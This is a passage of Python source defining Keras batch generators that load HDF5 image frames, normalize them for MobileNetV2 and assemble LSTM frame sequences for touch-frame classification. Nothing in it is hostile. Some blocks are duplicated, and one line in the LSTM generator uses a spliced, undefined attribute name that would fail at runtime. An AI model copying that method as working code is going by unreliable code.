raw_X):\n \"\"\"input num_of_images x H x W, image input must be grayscale\n MobileNetV2 requires certain image dimensions\n We use N x 61 x 61 formated images\n self.IMG_SIZE is a single number to change the images into, images must be square\n\n Parameters\n ----------\n raw_X :\n \n\n Returns\n -------\n\n \n \"\"\"\n # rgb_batch = np.repeat(raw_X[..., np.newaxis], 3, -1)\n # rgb_tensor = tf.cast(rgb_batch, tf.float32) # convert to tf tensor with float32 dtypes\n # rgb_tensor = (rgb_tensor / 127.5) - 1 # /127.5 = 0:2, -1 = -1:1 requirement for mobilenetV2\n # rgb_tensor = tf.image.resize(rgb_tensor, (self.IMG_SIZE, self.IMG_SIZE)) # resizing\n # self.IMG_SHAPE = (self.IMG_SIZE, self.IMG_SIZE, 3)\n # return rgb_tensor\n if len(raw_X.shape) == 4 and raw_X.shape[3] == 3:\n rgb_batch = copy.deepcopy(raw_X)\n else:\n rgb_batch = np.repeat(raw_X[..., np.newaxis], 3, -1)\n rgb_tensor = tf.cast(rgb_batch, tf.float32) # convert to tf tensor with float32 dtypes\n rgb_tensor = (rgb_tensor / 127.5) - 1 # /127.5 = 0:2, -1 = -1:1 requirement for mobilenetV2\n rgb_tensor = tf.image.resize(rgb_tensor, (self.IMG_SIZE, self.IMG_SIZE)) # resizing\n self.IMG_SHAPE = (self.IMG_SIZE, self.IMG_SIZE, 3)\n return rgb_tensor\n\n def plot_batch_distribution(self):\n \"\"\" \"\"\"\n # randomly select a batch and generate images and labels\n batch_num = np.random.choice(np.arange(0, self.__len__()))\n samp_x, samp_y = self.getXandY(batch_num)\n\n # look at the distribution of classes\n plt.pie([1 - np.mean(samp_y), np.mean(samp_y)],\n labels=['non-touch frames', 'touch frames'], autopct='%1.1f%%', )\n plt.title('class distribution from batch ' + str(batch_num))\n plt.show()\n\n # generate indices for positive and negative classes\n images_to_sample = 20\n neg_class = [i for i, val in enumerate(samp_y) if val == 0]\n pos_class = [i for i, val in enumerate(samp_y) if val == 1]\n neg_index = np.random.choice(neg_class, images_to_sample)\n pos_index = np.random.choice(pos_class, images_to_sample)\n\n # plot sample positive and negative class images\n plt.figure(figsize=(10, 10))\n samp_x = (samp_x + 1) / 2\n for i in range(images_to_sample):\n plt.subplot(5, 10, i + 1)\n plt.xticks([])\n plt.yticks([])\n plt.grid(False)\n _ = plt.imshow(samp_x[neg_index[i]])\n plt.xlabel('0')\n\n plt.subplot(5, 10, images_to_sample + i + 1)\n plt.xticks([])\n plt.yticks([])\n plt.grid(False)\n plt.imshow(samp_x[pos_index[i]])\n plt.xlabel('1')\n plt.suptitle('sample images from batch ' + str(batch_num))\n plt.show()\n\n\ndef image_transform_(IMG_SIZE, raw_X):\n \"\"\"\n input num_of_images x H x W, image input must be grayscale\n MobileNetV2 requires certain image dimensions\n We use N x 61 x 61 formated images\n self.IMG_SIZE is a single number to change the images into, images must be square\n\n Parameters\n ----------\n raw_X :\n\n\n Returns\n -------\n\n\n \"\"\"\n\n if len(raw_X.shape) == 4 and raw_X.shape[3] == 3:\n rgb_batch = copy.deepcopy(raw_X)\n else:\n rgb_batch = np.repeat(raw_X[..., np.newaxis], 3, -1)\n rgb_tensor = tf.cast(rgb_batch, tf.float32) # convert to tf tensor with float32 dtypes\n rgb_tensor = (rgb_tensor / 127.5) - 1 # /127.5 = 0:2, -1 = -1:1 requirement for mobilenetV2\n rgb_tensor = tf.image.resize(rgb_tensor, (IMG_SIZE, IMG_SIZE)) # resizing\n IMG_SHAPE = (IMG_SIZE, IMG_SIZE, 3)\n return rgb_tensor\n\n\nclass ImageBatchGenerator(keras.utils.Sequence):\n \"\"\" \"\"\"\n\n def __init__(self, batch_size, h5_file_list, label_key='labels'):\n h5_file_list = utils.make_list(h5_file_list, suppress_warning=True)\n num_frames_in_all_H5_files = get_total_frame_count(h5_file_list)\n file_inds_for_H5_extraction = batch_size_file_ind_selector(\n num_frames_in_all_H5_files, batch_size)\n subtract_for_index = reset_to_first_frame_for_each_file_ind(\n file_inds_for_H5_extraction)\n # self.to_fit = to_fit #set to True to return XY and False to return X\n self.label_key = label_key\n self.batch_size = batch_size\n self.H5_file_list = h5_file_list\n self.num_frames_in_all_H5_files = num_frames_in_all_H5_files\n self.file_inds_for_H5_extraction = file_inds_for_H5_extraction\n self.subtract_for_index = subtract_for_index\n self.IMG_SIZE = 96\n\n def __len__(self):\n return len(self.file_inds_for_H5_extraction)\n\n def __getitem__(self, num_2_extract):\n b = self.batch_size\n h = self.H5_file_list\n i = self.file_inds_for_H5_extraction\n H5_file = h[np.int(i[num_2_extract])]\n with h5py.File(H5_file, 'r') as H5:\n # H5 = h5py.File(H5_file, 'r')\n\n images = H5['images']\n num_2_extract_mod = num_2_extract - self.subtract_for_index[num_2_extract]\n raw_X = images[b * num_2_extract_mod:b * (num_2_extract_mod + 1)]\n rgb_tensor = self.image_transform(raw_X)\n\n labels_tmp = H5[self.label_key]\n raw_Y = labels_tmp[b * num_2_extract_mod:b * (num_2_extract_mod + 1)]\n H5.close()\n return rgb_tensor, raw_Y\n\n # def __getitem__(self, num_2_extract):\n # b = self.batch_size\n # h = self.H5_file_list\n # i = self.file_inds_for_H5_extraction\n # H5_file = h[np.int(i[num_2_extract])]\n # H5 = h5py.File(H5_file, 'r')\n # # list(H5.keys())\n #\n # images = H5['images']\n # num_2_extract_mod = num_2_extract - self.subtract_for_index[num_2_extract]\n # raw_X = images[b * num_2_extract_mod:b * (num_2_extract_mod + 1)]\n # rgb_tensor = self.image_transform(raw_X)\n #\n # # if self.to_fit:\n # # labels_tmp = H5[self.label_key]\n # # raw_Y = labels_tmp[b*num_2_extract_mod:b*(num_2_extract_mod+1)]\n # # return rgb_tensor, raw_Y\n # # else:\n # return rgb_tensor\n\n def getXandY(self, num_2_extract):\n \"\"\"\n\n Parameters\n ----------\n num_2_extract :\n\n\n Returns\n -------\n\n\n \"\"\"\n b = self.batch_size\n h = self.H5_file_list\n i = self.file_inds_for_H5_extraction\n H5_file = h[np.int(i[num_2_extract])]\n H5 = h5py.File(H5_file, 'r')\n # list(H5.keys())\n\n images = H5['images']\n num_2_extract_mod = num_2_extract - self.subtract_for_index[num_2_extract]\n raw_X = images[b * num_2_extract_mod:b * (num_2_extract_mod + 1)]\n rgb_tensor = self.image_transform(raw_X)\n labels_tmp = H5[self.label_key]\n raw_Y = labels_tmp[b * num_2_extract_mod:b * (num_2_extract_mod + 1)]\n return rgb_tensor, raw_Y\n\n def image_transform(self, raw_X):\n \"\"\"input num_of_images x H x W, image input must be grayscale\n MobileNetV2 requires certain image dimensions\n We use N x 61 x 61 formated images\n self.IMG_SIZE is a single number to change the images into, images must be square\n\n Parameters\n ----------\n raw_X :\n\n\n Returns\n -------\n\n\n \"\"\"\n # rgb_batch = np.repeat(raw_X[..., np.newaxis], 3, -1)\n # rgb_tensor = tf.cast(rgb_batch, tf.float32) # convert to tf tensor with float32 dtypes\n # rgb_tensor = (rgb_tensor / 127.5) - 1 # /127.5 = 0:2, -1 = -1:1 requirement for mobilenetV2\n # rgb_tensor = tf.image.resize(rgb_tensor, (self.IMG_SIZE, self.IMG_SIZE)) # resizing\n # self.IMG_SHAPE = (self.IMG_SIZE, self.IMG_SIZE, 3)\n # return rgb_tensor\n if len(raw_X.shape) == 4 and raw_X.shape[3] == 3:\n rgb_batch = copy.deepcopy(raw_X)\n else:\n rgb_batch = np.repeat(raw_X[..., np.newaxis], 3, -1)\n rgb_tensor = tf.cast(rgb_batch, tf.float32) # convert to tf tensor with float32 dtypes\n rgb_tensor = (rgb_tensor / 127.5) - 1 # /127.5 = 0:2, -1 = -1:1 requirement for mobilenetV2\n rgb_tensor = tf.image.resize(rgb_tensor, (self.IMG_SIZE, self.IMG_SIZE)) # resizing\n self.IMG_SHAPE = (self.IMG_SIZE, self.IMG_SIZE, 3)\n return rgb_tensor\n\n def plot_batch_distribution(self):\n \"\"\" \"\"\"\n # randomly select a batch and generate images and labels\n batch_num = np.random.choice(np.arange(0, self.__len__()))\n samp_x, samp_y = self.getXandY(batch_num)\n\n # look at the distribution of classes\n plt.pie([1 - np.mean(samp_y), np.mean(samp_y)],\n labels=['non-touch frames', 'touch frames'], autopct='%1.1f%%', )\n plt.title('class distribution from batch ' + str(batch_num))\n plt.show()\n\n # generate indices for positive and negative classes\n images_to_sample = 20\n neg_class = [i for i, val in enumerate(samp_y) if val == 0]\n pos_class = [i for i, val in enumerate(samp_y) if val == 1]\n neg_index = np.random.choice(neg_class, images_to_sample)\n pos_index = np.random.choice(pos_class, images_to_sample)\n\n # plot sample positive and negative class images\n plt.figure(figsize=(10, 10))\n samp_x = (samp_x + 1) / 2\n for i in range(images_to_sample):\n plt.subplot(5, 10, i + 1)\n plt.xticks([])\n plt.yticks([])\n plt.grid(False)\n _ = plt.imshow(samp_x[neg_index[i]])\n plt.xlabel('0')\n\n plt.subplot(5, 10, images_to_sample + i + 1)\n plt.xticks([])\n plt.yticks([])\n plt.grid(False)\n plt.imshow(samp_x[pos_index[i]])\n plt.xlabel('1')\n plt.suptitle('sample images from batch ' + str(batch_num))\n plt.show()\n\n\ndef image_transform_(IMG_SIZE, raw_X):\n \"\"\"\n input num_of_images x H x W, image input must be grayscale\n MobileNetV2 requires certain image dimensions\n We use N x 61 x 61 formated images\n self.IMG_SIZE is a single number to change the images into, images must be square\n\n Parameters\n ----------\n raw_X :\n\n\n Returns\n -------\n\n\n \"\"\"\n\n if len(raw_X.shape) == 4 and raw_X.shape[3] == 3:\n rgb_batch = copy.deepcopy(raw_X)\n else:\n rgb_batch = np.repeat(raw_X[..., np.newaxis], 3, -1)\n rgb_tensor = tf.cast(rgb_batch, tf.float32) # convert to tf tensor with float32 dtypes\n rgb_tensor = (rgb_tensor / 127.5) - 1 # /127.5 = 0:2, -1 = -1:1 requirement for mobilenetV2\n rgb_tensor = tf.image.resize(rgb_tensor, (IMG_SIZE, IMG_SIZE)) # resizing\n IMG_SHAPE = (IMG_SIZE, IMG_SIZE, 3)\n return rgb_tensor\n\n\n# finished extractor........\n\n\n# lstm_len = 5\n#\n# batch_size = 10\n# num_2_extract = 24\n\n\nclass ImageBatchGenerator_simple(keras.utils.Sequence):\n\n def __init__(self, batch_size, h5_file_list, label_key='labels', IMG_SIZE=None):\n\n h5_file_list = utils.make_list(h5_file_list, suppress_warning=True)\n num_frames_in_all_H5_files = get_total_frame_count(h5_file_list)\n file_inds_for_H5_extraction = batch_size_file_ind_selector(num_frames_in_all_H5_files, batch_size)\n subtract_for_index = reset_to_first_frame_for_each_file_ind(file_inds_for_H5_extraction)\n self.label_key = label_key\n self.batch_size = batch_size\n self.H5_file_list = h5_file_list\n self.num_frames_in_all_H5_files = num_frames_in_all_H5_files\n self.file_inds_for_H5_extraction = file_inds_for_H5_extraction\n self.subtract_for_index = subtract_for_index\n self.IMG_SIZE = IMG_SIZE\n\n def image_transform(self, raw_X):\n if len(raw_X.shape) >= 4 and raw_X.shape[-1] == 3:\n rgb_batch = copy.deepcopy(raw_X)\n else:\n rgb_batch = np.repeat(raw_X[..., np.newaxis], 3, -1)\n rgb_tensor = rgb_batch\n rgb_tensor = tf.cast(rgb_batch, tf.float32) # convert to tf tensor with float32 dtypes\n rgb_tensor = (rgb_tensor / 127.5) - 1 # /127.5 = 0:2, -1 = -1:1 requirement for mobilenetV2\n if self.IMG_SIZE is not None:\n if len(raw_X.shape) <= 4:\n rgb_tensor = tf.image.resize(rgb_tensor, (self.IMG_SIZE, self.IMG_SIZE)) # resizing\n elif len(raw_X.shape) == 5:\n s = list(raw_X.shape)\n s[-3:-1] = [self.IMG_SIZE, self.IMG_SIZE]\n new_img = np.zeros(s).astype('float32')\n for lstm_i in range(raw_X.shape[1]):\n new_img[:, lstm_i, :, :, :] = tf.image.resize(rgb_tensor[:, lstm_i, ...],\n (self.IMG_SIZE, self.IMG_SIZE)).numpy()\n rgb_tensor = new_img\n else:\n assert 1 == 0, \"shape is screwed up...\"\n # rgb_tensor = tf.cast(rgb_tensor, np.uint8)\n # self.IMG_SHAPE = (self.IMG_SIZE, self.IMG_SIZE, 3)\n return rgb_tensor\n\n def __getitem__(self, num_2_extract):\n h = self.H5_file_list\n i = self.file_inds_for_H5_extraction\n H5_file = h[np.int(i[num_2_extract])]\n num_2_extract_mod = num_2_extract - self.subtract_for_index[num_2_extract]\n i1 = num_2_extract_mod * self.batch_size\n i2 = num_2_extract_mod * self.batch_size + self.batch_size\n with h5py.File(H5_file, 'r') as h:\n out = h['images'][i1:i2]\n out = self.image_transform(out)\n raw_Y = h[self.label_key][i1:i2]\n return out, raw_Y\n\n def __len__(self):\n return len(self.file_inds_for_H5_extraction)\n\n def getXandY(self, num_2_extract):\n rgb_tensor, raw_Y = self.__getitem__(num_2_extract)\n return rgb_tensor, raw_Y\n\n\nclass ImageBatchGenerator_LSTM(keras.utils.Sequence):\n \"\"\" \"\"\"\n\n def __init__(self, lstm_len, batch_size, h5_file_list, label_key='labels', IMG_SIZE=96):\n assert lstm_len % 2 == 1, \"number of images must be odd\"\n h5_file_list = utils.make_list(h5_file_list, suppress_warning=True)\n num_frames_in_all_H5_files = get_total_frame_count(h5_file_list)\n file_inds_for_H5_extraction = batch_size_file_ind_selector(\n num_frames_in_all_H5_files, batch_size)\n subtract_for_index = reset_to_first_frame_for_each_file_ind(\n file_inds_for_H5_extraction)\n # self.to_fit = to_fit #set to True to return XY and False to return X\n self.label_key = label_key\n self.batch_size = batch_size\n self.H5_file_list = h5_file_list\n self.num_frames_in_all_H5_files = num_frames_in_all_H5_files\n self.file_inds_for_H5_extraction = file_inds_for_H5_extraction\n self.subtract_for_index = subtract_for_index\n self.IMG_SIZE = IMG_SIZE\n self.lstm_len = lstm_len\n self.get_frame_edges()\n\n def get_frame_edges(self):\n self.all_edges_list = []\n b = self.lstm_len // 2\n s = [b * 2, self.lstm_len, self.IMG_SIZE, self.IMG_SIZE, 3]\n for H5_file in self.H5_file_list:\n with h5py.File(H5_file,\n 'r') as h: # 0(0, 1) 1(0) 3998(-1) 3999(-2, -1) ... 4000(0, 1) 4001(0) 7998(-1) 7999(-2, -1) #0,0 0,1 1,0 3998,-1 3999,-2 3999,-1\n full_edges_mask = np.ones(s)\n edge_ind = np.flip(np.arange(1, b + 1))\n for i in np.arange(1, b + 1):\n full_edges_mask[i - 1, :edge_ind[i - 1], ...] = np.zeros_like(\n full_edges_mask[i - 1, :edge_ind[i - 1], ...])\n full_edges_mask[-i, -edge_ind[i - 1]:, ...] = np.zeros_like(\n full_edges_mask[-i, -edge_ind[i - 1]:, ...])\n all_edges = []\n for i1, i2 in utils.loop_segments(h['frame_nums']): # 0, 1, 3998, 3999 ; 4000, 4001, 7998, 7999; ...\n edges = (np.asarray([[i1], [i2 - b]]) + np.arange(0, b).T).flatten()\n all_edges.append(edges)\n all_edges = np.asarray(all_edges)\n self.all_edges_list.append(all_edges)\n full_edges_mask = full_edges_mask.astype(int)\n self.full_edges_mask = full_edges_mask == 0\n\n def __getitem__(self, num_2_extract):\n h = self.H5_file_list\n i = self.file_inds_for_H5_extraction\n all_edges = self.all_edges_list[np.int(i[num_2_extract])]\n H5_file = h[np.int(i[num_2_extract])]\n num_2_extract_mod = num_2_extract - self.subtract_forImageBatchGenerator_feature_array_index[num_2_extract]\n with h5py.File(H5_file, 'r') as h:\n b = self.lstm_len // 2\n tot_len = h['images'].shape[0]\n assert tot_len - b > self.batch_size, \"reduce batch size to be less than total length of images minus floor(lstm_len) - 1, MAX->\" + str(\n tot_len - b - 1)\n i1 = num_2_extract_mod * self.batch_size - b\n i2 = num_2_extract_mod * self.batch_size + self.batch_size + b\n edge_left_trigger = abs(min(i1, 0))\n edge_right_trigger = min(abs(min(tot_len - i2, 0)), b)\n x = h['images'][max(i1, 0):min(i2, tot_len)]\n if edge_left_trigger + edge_right_trigger > 0: # in case of edge cases\n pad_shape = list(x.shape)\n pad_shape[0] = edge_left_trigger + edge_right_trigger\n pad = np.zeros(pad_shape).astype('uint8')\n if edge_left_trigger > edge_right_trigger:\n x = np.concatenate((pad, x), axis=0)\n else:\n x = np.concatenate((x, pad), axis=0)\n x = self.image_transform(x)\n s = list(x.shape)\n s.insert(1, self.lstm_len)\n out = np.zeros(s).astype('float32') # before was uint8\n # out = tf.cast(out, tf.float32)\n\n for i in range(self.lstm_len):\n i1 = max(0, b - i)\n i2 = min(s[0], s[0] + b - i)\n i3 = max(0, i - b)\n i4 = min(s[0], s[0] + i - b)\n # print('take ', i3,' to ', i4, ' and place in ', i1,' to ', i2)\n out[i1:i2, i, ...] = x[i3:i4, ...]\n out = out[b:s[0] - b, ...]\n i1 = num_2_extract_mod * self.batch_size\n i2 = num_2_extract_mod * self.batch_size + self.batch_size\n raw_Y = h[self.label_key][i1:i2]\n # black out edges from frame to frame\n adjust_these_edge_frames = np.intersect1d(all_edges.flatten(), np.arange(i1, i2))\n for atef in adjust_these_edge_frames:\n # mask_ind = np.where(atef == all_edges)[1][0]\n # out[atef] = out[atef] * (self.full_edges_mask[mask_ind]\n\n mask_ind = np.where(atef == all_edges)[1][0]\n mask_ = self.full_edges_mask[mask_ind]\n out[atef - i1][mask_] = -1\n return out, raw_Y\n\n # gray mask(set array to -1 not 0 ),DONE\n # doesnt fill the edges as expected, DONE\n # outputs format 0-255 not -1 to 1 DONE this was just custom code not from image_tools\n # need to test this with uneven frames\n def __len__(self):\n return len(self.file_inds_for_H5_extraction)\n\n def getXandY(self, num_2_extract):\n \"\"\"\n\n Parameters\n ----------\n num_2_extract :\n\n\n Returns\n -------\n\n \"\"\"\n rgb_tensor, raw_Y = self.__getitem__(num_2_extract)\n return rgb_tensor, raw_Y\n\n def image_transform(self, raw_X):\n \"\"\"input num_of_images x H x W, image input must be grayscale\n MobileNetV2 requires certain image dimensions\n We use N x 61 x 61 formated images\n self.IMG_SIZE is a single number to change the images into, images must be square\n\n Parameters\n ----------\n raw_X :\n\n\n Returns\n -------\n\n\n \"\"\"\n if len(raw_X.shape) == 4 and raw_X.shape[3] == 3:\n rgb_batch = copy.deepcopy(raw_X)\n else:\n rgb_batch = np.repeat(raw_X[..., np.newaxis], 3, -1)\n rgb_tensor = rgb_batch\n # rgb_tensor = tf.cast(rgb_batch, tf.float32) # convert to tf tensor with float32 dtypes\n rgb_tensor = (rgb_tensor / 127.5) - 1 # /127.5 = 0:2, -1 = -1:1 requirement for mobilenetV2 #commented before\n rgb_tensor = tf.image.resize(rgb_tensor, (self.IMG_SIZE, self.IMG_SIZE)) # resizing\n # rgb_tensor = tf.cast(rgb_tensor, np.uint8)# un commented before\n self.IMG_SHAPE = (self.IMG_SIZE, self.IMG_SIZE, 3)\n return rgb_tensor\n\n\nclass ImageBatchGenerator_LSTM_2(keras.utils.Sequence):\n \"\"\" \"\"\"\n\n def __init__(self, lstm_len, batch_size, h5_file_list, label_key='labels', IMG_SIZE=96):\n assert lstm_len % 2 == 1, \"number of images must be odd\"\n h5_file_list = utils.make_list(h5_file_list, suppress_warning=True)\n num_frames_in_all_H5_files = get_total_frame_count(h5_file_list)\n file_inds_for_H5_extraction = batch_size_file_ind_selector(\n num_frames_in_all_H5_files, batch_size)\n subtract_for_index = reset_to_first_frame_for_each_file_ind(\n file_inds_for_H5_extraction)\n # self.to_fit = to_fit #set to True to return XY and False to return X\n self.label_key = label_key\n self.batch_size = batch_size\n self.H5_file_list = h5_file_list\n self.num_frames_in_all_H5_files = num_frames_in_all_H5_files\n self.file_inds_for_H5_extraction = file_inds_for_H5_extraction\n self.subtract_for_index = subtract_for_index\n self.IMG_SIZE = IMG_SIZE\n self.lstm_len = lstm_len\n self.get_frame_edges()\n\n def get_frame_edges(self):\n self.all_edges_list = []\n b = self.lstm_len // 2\n s = [b * 2, self.lstm_len, self.IMG_SIZE, self.IMG_SIZE, 3]\n for H5_file in self.H5_file_list:\n with h5py.File(H5_file,\n 'r') as h: # 0(0, 1) 1(0) 3998(-1) 3999(-2, -1) ... 4000(0, 1) 4001(0) 7998(-1) 7999(-2, -1) #0,0 0,1 1,0 3998,-1 3999,-2 3999,-1\n full_edges_mask = np.ones(s)\n edge_ind = np.flip(np.arange(1, b + 1))\n for i in np.arange(1, b + 1):\n full_edges_mask[i - 1, :edge_ind[i - 1], ...] = np.zeros_like(\n full_edges_mask[i - 1, :edge_ind[i - 1], ...])\n full_edges_mask[-i, -edge_ind[i - 1]:, ...] = np.zeros_like(\n full_edges_mask[-i, -edge_ind[i - 1]:, ...])\n all_edges = []\n for i1, i2 in utils.loop_segments(h['frame_nums']): # 0, 1, 3998, 3999 ; 4000, 4001, 7998, 7999; ...\n edges = (np.asarray([[i1], [i2 - b]]) + np.arange(0, b).T).flatten()\n all_edges.append(edges)\n all_edges = np.asarray(all_edges)\n self.all_edges_list.append(all_edges)\n full_edges_mask = full_edges_mask.astype(int)\n self.full_edges_mask = full_edges_mask == 0\n\n def __getitem__(self, num_2_extract):\n h = self.H5_file_list\n i = self.file_inds_for_H5_extraction\n all_edges = self.all_edges_list[np.int(i[num_2_extract])]\n H5_file = h[np.int(i[num_2_extract])]\n num_2_extract_mod = num_2_extract - self.subtract_for_index[num_2_extract]\n with h5py.File(H5_file, 'r') as h:\n b = self.lstm_len // 2\n tot_len = h['images'].shape[0]\n assert tot_len - b > self.batch_size, \"reduce batch size to be less than total length of images minus floor(lstm_len) - 1, MAX->\" + str(\n tot_len - b - 1)\n i1 = num_2_extract_mod * self.batch_size - b\n i2 = num_2_extract_mod * self.batch_size + self.batch_size + b\n edge_left_trigger = abs(min(i1, 0))\n edge_right_trigger = min(abs(min(tot_len - i2, 0)), b)\n x = h['images'][max(i1, 0):min(i2, tot_len)]\n if edge_left_trigger + edge_right_trigger > 0: # in case of edge cases\n pad_shape = list(x.shape)\n pad_shape[0] = edge_left_trigger + edge_right_trigger\n pad = np.zeros(pad_shape).astype('uint8')\n if edge_left_trigger > edge_right_trigger:\n x = np.concatenate((pad, x), axis=0)\n else:\n x = np.concatenate((x, pad), axis=0)\n x = self.image_transform(x)\n s = list(x.shape)\n s.insert(1, self.lstm_len)\n out = np.zeros(s).astype('float32') # before was uint8\n # out = tf.cast(out, tf.float32)\n\n for i in range(self.lstm_len):\n i1 = max(0, b - i)\n i2 = min(s[0], s[0] + b - i)\n i3 = max(0, i - b)\n i4 = min(s[0], s[0] + i - b)\n # print('take ', i3,' to ', i4, ' and place in ', i1,' to ', i2)\n out[i1:i2, i, ...] = x[i3:i4, ...]\n out = out[b:s[0] - b, ...]\n i1 = num_2_extract_mod * self.batch_size\n i2 = num_2_extract_mod * self.batch_size + self.batch_size\n raw_Y = h[self.label_key][i1:i2]\n # black out edges from frame to frame\n adjust_these_edge_frames = np.intersect1d(all_edges.flatten(), np.arange(i1, i2))\n for atef in adjust_these_edge_frames:\n # mask_ind = np.where(atef == all_edges)[1][0]\n # out[atef] = out[atef] * (self.full_edges_mask[mask_ind]\n\n mask_ind = np.where(atef == all_edges)[1][0]\n mask_ = self.full_edges_mask[mask_ind]\n out[atef - i1][mask_] = -1\n return out, raw_Y\n\n # gray mask(set array to -1 not 0 ),DONE\n # doesnt fill the edges as expected, DONE\n # outputs format 0-255 not -1 to 1 DONE this was just custom code not from image_tools\n # need to test this with uneven frames\n def __len__(self):\n return len(self.file_inds_for_H5_extraction)\n\n def getXandY(self, num_2_extract):\n \"\"\"\n\n Parameters\n ----------\n num_2_extract :\n\n\n Returns\n -------\n\n \"\"\"\n rgb_tensor, raw_Y = self.__getitem__(num_2_extract)\n return rgb_tensor, raw_Y\n\n def image_transform(self, raw_X):\n \"\"\"input num_of_images x H x W, image input must be grayscale\n MobileNetV2 requires certain image dimensions\n We use N x 61 x 61 formated images\n self.IMG_SIZE is a single number to change the images into, images must be square\n\n Parameters\n ----------\n raw_X :\n\n\n Returns\n -------\n\n\n \"\"\"\n if len(raw_X.shape) == 4 and raw_X.shape[3] == 3:\n rgb_batch = copy.deepcopy(raw_X)\n else:\n rgb_batch = np.repeat(raw_X[..., np.newaxis], 3, -1)\n rgb_tensor = rgb_batch\n # rgb_tensor = tf.cast(rgb_batch, tf.float32) # convert to tf tensor with float32 dtypes\n rgb_tensor = (rgb_tensor / 127.5) - 1 # /127.5 = 0:2, -1 = -1:1 requirement for mobilenetV2 #commented before\n rgb_tensor = tf.image.resize(rgb_tensor, (self.IMG_SIZE, self.IMG_SIZE)) # resizing\n # rgb_tensor = tf.cast(rgb_tensor, np.uint8)# un commented before\n self.IMG_SHAPE = (self.IMG_SIZE, self.IMG_SIZE, 3)\n return rgb_tensor\n\n\ndef convert_h5_to_LSTM_h5(h5_file_list, lstm_h5_name, lstm_len=7, batch_size=100, label_key='labels', IMG_SIZE=96,\n disable_tqdm=False):\n \"\"\"\n convert any H5 files with the 3 oclor channels into the LSTM format, then use iamge_tools.ImageBatchGenerator_simple\n to directly draw from the H5 files to save time with converting them in the generator each time\n Parameters\n ----------\n h5_file_list :\n lstm_h5_name :\n lstm_len :\n batch_size :\n label_key :\n IMG_SIZE :\n disable_tqdm :\n\n Returns\n -------\n\n \"\"\"\n utils.make_list(h5_file_list, suppress_warning=True)\n G = ImageBatchGenerator_LSTM(lstm_len, batch_size, h5_file_list, label_key=label_key, IMG_SIZE=IMG_SIZE)\n Path(os.path.dirname(lstm_h5_name)).mkdir(parents=True, exist_ok=True)\n h5creator = h5_iterative_creator(lstm_h5_name)\n for k in tqdm(range(G.__len__()), disable=disable_tqdm):\n x, y = G.__getitem__(k)\n h5creator.add_to_h5(x, y)\n frame_nums = get_h5_key_and_concatenate(h5_file_list, 'frame_nums')\n utils.force_write_to_h5(h5creator.h5_full_file_name, frame_nums, 'frame_nums')\n\n\n#\n# class ImageBatchGenerator_feature_array(keras.utils.Sequence):\n# \"\"\" \"\"\"\n#\n# def __init__(self, lstm_len, batch_size, h5_file_list, label_key='labels', feature_len=2048,\n# label_index_to_lstm_len=None):\n# assert lstm_len % 2 == 1, \"number of images must be odd\"\n# if label_index_to_lstm_len is None:\n# label_index_to_lstm_len = lstm_len // 2 # in the middle\n# h5_file_list = utils.make_list(h5_file_list, suppress_warning=True)\n# num_frames_in_all_H5_files = get_total_frame_count(h5_file_list)\n# file_inds_for_H5_extraction = batch_size_file_ind_selector(\n# num_frames_in_all_H5_files, batch_size)\n# subtract_for_index = reset_to_first_frame_for_each_file_ind(\n# file_inds_for_H5_extraction)\n# # self.to_fit = to_fit #set to True to return XY and False to return X\n# self.label_key = label_key\n# self.batch_size = batch_size\n# self.H5_file_list = h5_file_list\n# self.num_frames_in_all_H5_files = num_frames_in_all_H5_files\n# self.file_inds_for_H5_extraction = file_inds_for_H5_extraction\n# self.subtract_for_index = subtract_for_index\n# self.label_index_to_lstm_len = label_index_to_lstm_len\n# self.lstm_len = lstm_len\n# self.feature_len = feature_len\n# self.get_frame_edges()\n#\n# def get_frame_edges(self):\n# self.all_edges_list = []\n# b = self.lstm_len // 2\n# self.lstm_len\n# self.feature_len\n# s = [b * 2, self.lstm_len, self.feature_len]\n# for H5_file in self.H5_file_list:\n# with h5py.File(H5_file,\n# 'r') as h: # 0(0, 1) 1(0) 3998(-1) 3999(-2, -1) ... 4000(0, 1) 4001(0) 7998(-1) 7999(-2, -1) #0,0 0,1 1,0 3998,-1 3999,-2 3999,-1\n# full_edges_mask = np.ones(s)\n# edge_ind = np.flip(np.arange(1, b + 1))\n# for i in np.arange(1, b + 1):\n# full_edges_mask[i - 1, :edge_ind[i - 1], ...] = np.zeros_like(\n# full_edges_mask[i - 1, :edge_ind[i - 1], ...])\n# full_edges_mask[-i, -edge_ind[i - 1]:, ...] = np.zeros_like(\n# full_edges_mask[-i, -edge_ind[i - 1]:, ...])\n# all_edges = []\n# for i1, i2 in utils.loop_segments(h['frame_nums']): # 0, 1, 3998, 3999 ; 4000, 4001, 7998, 7999; ...\n# edges = (np.asarray([[i1], [i2 - b]]) + np.arange(0, b).T).flatten()\n# all_edges.append(edges)\n# all_edges = np.asarray(all_edges)\n# self.all_edges_list.append(all_edges)\n# full_edges_mask = full_edges_mask.astype(int)\n# self.full_edges_mask = full_edges_mask == 0\n#\n# def __getitem__(self, num_2_extract):\n# h = self.H5_file_list\n# i = self.file_inds_for_H5_extraction\n# all_edges = self.all_edges_list[np.int(i[num_2_extract])]\n# H5_file = h[np.int(i[num_2_extract])]\n# num_2_extract_mod = num_2_extract - self.subtract_for_index[num_2_extract]\n# with h5py.File(H5_file, 'r') as h:\n# b = self.lstm_len // 2\n# tot_len = h['images'].shape[0]\n# assert tot_len - b > self.batch_size, \"reduce batch size to be less than total length of images minus floor(lstm_len) - 1, MAX->\" + str(\n# tot_len - b - 1)\n# i1 = num_2_extract_mod * self.batch_size - b\n# i2 = num_2_extract_mod * self.batch_size + self.batch_size + b\n# edge_left_trigger = abs(min(i1, 0))\n# edge_right_trigger = min(abs(min(tot_len - i2, 0)), b)\n# x = h['images'][max(i1, 0):min(i2, tot_len)]\n# if edge_left_trigger + edge_right_trigger > 0: # in case of edge cases\n# pad_shape = list(x.shape)\n# pad_shape[0] = edge_left_trigger + edge_right_trigger\n# pad = np.zeros(pad_shape).astype('uint8')\n# if edge_left_trigger > edge_right_trigger:\n# x = np.concatenate((pad, x), axis=0)\n# else:\n# x = np.concatenate((x, pad), axis=0)\n# x = self.image_transform(x)\n# s = list(x.shape)\n# s.insert(1, self.lstm_len)\n# out = np.zeros(s).astype('float32') # before was uint8\n# # out = tf.cast(out, tf.float32)\n#\n# for i in range(self.lstm_len):\n# i1 = max(0, b - i)\n# i2 = min(s[0], s[0] + b - i)\n# i3 = max(0, i - b)\n# i4 = min(s[0], s[0] + i - b)\n# # print('take ', i3,' to ', i4, ' and place in ', i1,' to ', i2)\n# out[i1:i2, i, ...] = x[i3:i4, ...]\n# out = out[b:s[0] - b, ...]\n# 